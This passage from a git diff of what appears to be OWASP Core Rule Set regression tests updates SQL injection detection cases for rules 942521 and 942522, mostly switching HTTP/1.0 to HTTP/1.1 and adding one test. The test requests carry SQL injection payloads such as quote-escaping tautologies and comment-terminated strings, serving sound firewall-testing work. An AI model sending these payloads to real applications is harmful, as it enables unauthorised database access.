           uri: "/post"
           data: "var='''or%201"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -255,7 +255,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%5C'lol'%20or%20'1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -272,7 +272,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -289,7 +289,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -306,7 +306,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -323,7 +323,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -340,7 +340,7 @@ tests:
           port: 80
           uri: "/post"
           data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -356,7 +356,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -372,7 +372,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -388,7 +388,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -404,7 +404,24 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
+        output:
+          log:
+            expect_ids: [942521]
+  - test_id: 25
+    desc: "Integration test: 942521 blocks foo'or'oof"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "var=foo'or'oof"
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
index f81b8e311..bf85c50cf 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
@@ -18,7 +18,7 @@ tests:
           uri: "/post"
           # \'or'1
           data: "var=%5C'or'1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
@@ -36,7 +36,7 @@ tests:
           uri: "/post"
           # \"or"1
           data: "var=%5C%22or%221"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
@@ -54,7 +54,7 @@ tests:
           uri: "/post"
           # \`or`1
           data: "var=%5C%60or%601"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
@@ -71,7 +71,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%5C'and"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
@@ -88,7 +88,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='or'1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942522]
@@ -105,7 +105,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%5C' foo or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942522]
@@ -122,7 +122,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=newline%0A%5C' and 1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942522]
@@ -139,7 +139,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker